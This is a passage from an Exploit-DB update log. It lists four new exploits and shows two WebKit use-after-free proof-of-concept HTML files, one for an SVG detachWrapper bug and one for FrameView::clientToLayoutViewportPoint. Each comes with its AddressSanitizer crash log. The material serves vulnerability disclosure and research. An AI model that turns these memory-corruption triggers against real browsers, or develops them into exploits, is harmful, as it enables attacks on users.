DB: 2018-02-02

4 changes to exploits/shellcodes

WebKit - 'detachWrapper' Use-After-Free
WebKit - 'WebCore::FrameView::clientToLayoutViewportPoint' Use-After-Free
Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)
BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)

exploits/multiple/dos/43937.html

@@ -0,0 +1,152 @@
+<!--
+There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of Revision 225572 on OSX.
+
+The PoC is attached.
+
+Preliminary Analysis:
+
+SVGPropertyTearOff keeps a pointer to a SVG property in m_value. When detachWrapper() is called, that pointer gets dereferenced and the value copied. This comment explains when/why this is used
+https://github.com/WebKit/webkit/blob/5277f6fb92b0c03958265d24a7692142f7bdeaf8/Source/WebCore/svg/properties/SVGPropertyTearOff.h#L105
+SVGPropertyTearOff keeps track of just a single value. In case the SVG property is actually a list of values, the values are stored in a Vector and SVGPropertyTearOff will keep a pointer to somewhere inside the vector's buffer. If a vector gets resized before detachWrapper() is called and the vector's buffer gets realloc()'ed, SVGPropertyTearOff's m_value will point to freed memory.
+
+
+ASan log:
+
+=================================================================
+==50494==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000dccc0 at pc 0x0001262c1ba0 bp 0x7ffeee3a0460 sp 0x7ffeee3a0458
+READ of size 8 at 0x60c0000dccc0 thread T0
+==50494==WARNING: invalid path to external symbolizer!
+==50494==WARNING: Failed to use and restart external symbolizer!
+    #0 0x1262c1b9f in WebCore::SVGPropertyTearOff<WebCore::SVGLengthValue>::detachWrapper() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfe2b9f)
+    #1 0x1263e58ba in WebCore::SVGListProperty<WebCore::SVGLengthListValues>::detachListWrappersAndResize(WTF::Vector<WebCore::SVGLength*, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>*, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11068ba)
+    #2 0x12899fc77 in void WebCore::SVGAnimatedTypeAnimator::executeAction<WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues> >(WebCore::SVGAnimatedTypeAnimator::AnimationAction, WTF::Vector<WebCore::SVGElementAnimatedProperties, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&, unsigned int, WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues>::ContentType*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36c0c77)
+    #3 0x128985a0e in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a6a0e)
+    #4 0x128afacc2 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bcc2)
+    #5 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)
+    #6 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)
+    #7 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)
+    #8 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)
+    #9 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)
+    #10 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)
+    #11 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)
+    #12 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)
+    #13 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)
+    #14 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)
+    #15 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)
+    #16 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)
+    #17 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)
+    #18 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)
+    #19 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)
+    #20 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)
+    #21 0x7fff6611a42e in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x1042e)
+    #22 0x7fff66119081 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf081)
+    #23 0x10185d4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
+    #24 0x7fff65e4d114 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1114)
+
+0x60c0000dccc0 is located 0 bytes inside of 128-byte region [0x60c0000dccc0,0x60c0000dcd40)
+freed by thread T0 here:
+    #0 0x1239d4fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
+    #1 0x1358554b0 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fcb4b0)
+    #2 0x1263e6350 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::shrinkCapacity(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1107350)
+    #3 0x126972f81 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::operator=(WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1693f81)
+    #4 0x1289a03cd in WebCore::SVGLengthListValues::operator=(WebCore::SVGLengthListValues const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36c13cd)
+    #5 0x12899806d in void WebCore::SVGAnimatedTypeAnimator::resetFromBaseValue<WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues> >(WTF::Vector<WebCore::SVGElementAnimatedProperties, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&, WebCore::SVGAnimatedType&, WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues>::ContentType& (WebCore::SVGAnimatedType::*)()) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b906d)
+    #6 0x1289859d8 in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a69d8)
+    #7 0x128afacc2 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bcc2)
+    #8 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)
+    #9 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)
+    #10 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)
+    #11 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)
+    #12 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)
+    #13 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)
+    #14 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)
+    #15 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)
+    #16 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)
+    #17 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)
+    #18 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)
+    #19 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)
+    #20 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)
+    #21 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)
+    #22 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)
+    #23 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)
+    #24 0x7fff6611a42e in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x1042e)
+    #25 0x7fff66119081 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf081)
+    #26 0x10185d4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
+    #27 0x7fff65e4d114 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1114)
+
+previously allocated by thread T0 here:
+    #0 0x1239d4a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
+    #1 0x7fff65ff5200 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2200)
+    #2 0x135855944 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fcb944)
+    #3 0x135853bdd in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fc9bdd)
+    #4 0x1357c045b in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f3645b)
+    #5 0x1357bf90a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f3590a)
+    #6 0x1252e5ed8 in WTF::FastMalloc::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6ed8)
+    #7 0x1263e65f0 in WTF::VectorBufferBase<WebCore::SVGLengthValue, WTF::FastMalloc>::allocateBuffer(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11075f0)
+    #8 0x126973640 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::Vector(WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1694640)
+    #9 0x128998d47 in bool WebCore::SVGAnimationElement::adjustFromToListValues<WebCore::SVGLengthListValues>(WebCore::SVGLengthListValues const&, WebCore::SVGLengthListValues const&, WebCore::SVGLengthListValues&, float, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b9d47)
+    #10 0x1289985bf in WebCore::SVGAnimatedLengthListAnimator::calculateAnimatedValue(float, unsigned int, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b95bf)
+    #11 0x128984d78 in WebCore::SVGAnimateElementBase::calculateAnimatedValue(float, unsigned int, WebCore::SVGSMILElement*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a5d78)
+    #12 0x1289ae9cb in WebCore::SVGAnimationElement::updateAnimation(float, unsigned int, WebCore::SVGSMILElement*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36cf9cb)
+    #13 0x128afad65 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bd65)
+    #14 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)
+    #15 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)
+    #16 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)
+    #17 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)
+    #18 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)
+    #19 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)
+    #20 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)
+    #21 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)
+    #22 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)
+    #23 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)
+    #24 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)
+    #25 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)
+    #26 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)
+    #27 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)
+    #28 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)
+    #29 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfe2b9f) in WebCore::SVGPropertyTearOff<WebCore::SVGLengthValue>::detachWrapper()
+Shadow bytes around the buggy address:
+  0x1c180001b940: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
+  0x1c180001b950: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c180001b960: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+  0x1c180001b970: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
+  0x1c180001b980: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+=>0x1c180001b990: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd
+  0x1c180001b9a0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
+  0x1c180001b9b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c180001b9c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+  0x1c180001b9d0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
+  0x1c180001b9e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==50494==ABORTING
+-->
+
+<script>
+function eventhandler1() {
+var x = svgvar00003.x.animVal.getItem(0);
+svgvar00020.beginElement();
+}
+</script>
+<svg>
+<text x="1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1" id="svgvar00003">
+<set id="svgvar00020" attributeName="x" to="100" onbegin="eventhandler1()" />

exploits/multiple/dos/43938.html

@@ -0,0 +1,196 @@
+<!--
+There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of Revision 225572 on OSX.
+
+PoC:
+
+=================================================================
+-->
+
+<script>
+function jsfuzzer() {
+  var b = document.createElement("body");
+  a.append(b);
+  ta.autofocus = true;
+  var iframe = document.createElement("iframe");
+  b.appendChild(iframe);
+  li.appendChild(dd);
+  iframe.contentDocument.caretRangeFromPoint();
+}
+function eventhandler() {
+  ta.insertAdjacentElement("beforeBegin",a);
+}
+</script>
+<body onload=jsfuzzer()>
+<a id="a"></a>
+<li id="li"></li>
+<dd id="dd">
+<textarea id="ta" onfocus="eventhandler()"></textarea>
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==35149==ERROR: AddressSanitizer: heap-use-after-free on address 0x6190000b28c0 at pc 0x00040580c597 bp 0x7ffee42d6fe0 sp 0x7ffee42d6fd8
+READ of size 8 at 0x6190000b28c0 thread T0
+==35149==WARNING: invalid path to external symbolizer!
+==35149==WARNING: Failed to use and restart external symbolizer!
+    #0 0x40580c596 in WTF::Ref<WebCore::Frame>::operator WebCore::Frame&() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x52d596)
+    #1 0x407d6c045 in WebCore::FrameView::clientToLayoutViewportPoint(WebCore::FloatPoint) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a8d045)
+    #2 0x407568515 in WebCore::absolutePointIfNotClipped(WebCore::Document&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2289515)
+    #3 0x407568188 in WebCore::TreeScope::nodeFromPoint(WebCore::LayoutPoint const&, WebCore::LayoutPoint*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2289188)
+    #4 0x4073b0370 in WebCore::Document::caretRangeFromPoint(WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20d1370)
+    #5 0x4073b01d6 in WebCore::Document::caretRangeFromPoint(int, int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20d11d6)
+    #6 0x405b26710 in WebCore::jsDocumentPrototypeFunctionCaretRangeFromPointBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x847710)
+    #7 0x405aff967 in long long WebCore::IDLOperation<WebCore::JSDocument>::call<&(WebCore::jsDocumentPrototypeFunctionCaretRangeFromPointBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x820967)
+    #8 0x5b6aade01167  (<unknown module>)
+    #9 0x413893068 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9068)
+    #10 0x413893068 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9068)
+    #11 0x41388beef in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1eef)
+    #12 0x414ca63e5 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x141c3e5)
+    #13 0x414c29115 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x139f115)
+    #14 0x41506a549 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x17e0549)
+    #15 0x41506a6db in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x17e06db)
+    #16 0x41506aa81 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x17e0a81)
+    #17 0x406e74498 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1b95498)
+    #18 0x406eb47d6 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1bd57d6)
+    #19 0x40748442e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21a542e)
+    #20 0x4074773ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21983ee)
+    #21 0x407cc4c6e in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29e5c6e)
+    #22 0x407cd53ad in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29f63ad)
+    #23 0x4073bb78f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20dc78f)
+    #24 0x4073b4c90 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20d5c90)
+    #25 0x407b7f2c2 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a02c2)
+    #26 0x407b7c49c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x289d49c)
+    #27 0x4073d70b2 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20f80b2)
+    #28 0x407901554 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2622554)
+    #29 0x407b36c1b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2857c1b)
